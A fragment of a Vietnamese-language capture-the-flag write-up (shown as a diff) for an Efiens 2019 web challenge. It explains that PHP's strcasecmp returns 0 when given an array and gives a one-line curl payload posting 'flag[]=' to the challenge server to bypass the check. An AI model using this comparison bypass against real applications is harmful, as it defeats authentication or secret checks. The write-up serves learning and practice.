dinghi-security/Efiens_2019_Round_2_Web_Challenges_Write_Up/README.md

 ` strcasecmp ( string $str1 , string $str2 ) : Returns < 0 if str1 is less than str2; > 0 if str1 is greater than str2, and 0 if they are equal. `

-Nhưng nếu truyền vào 1 array thì `strcasecmp` vẫn trả về 0!!!!
+Nhưng nếu truyền vào 1 array thì `strcasecmp` vẫn trả về 0!!!! <br>

 Payload:

 `curl http://web2.efiens.com/index.php -d 'flag[]='`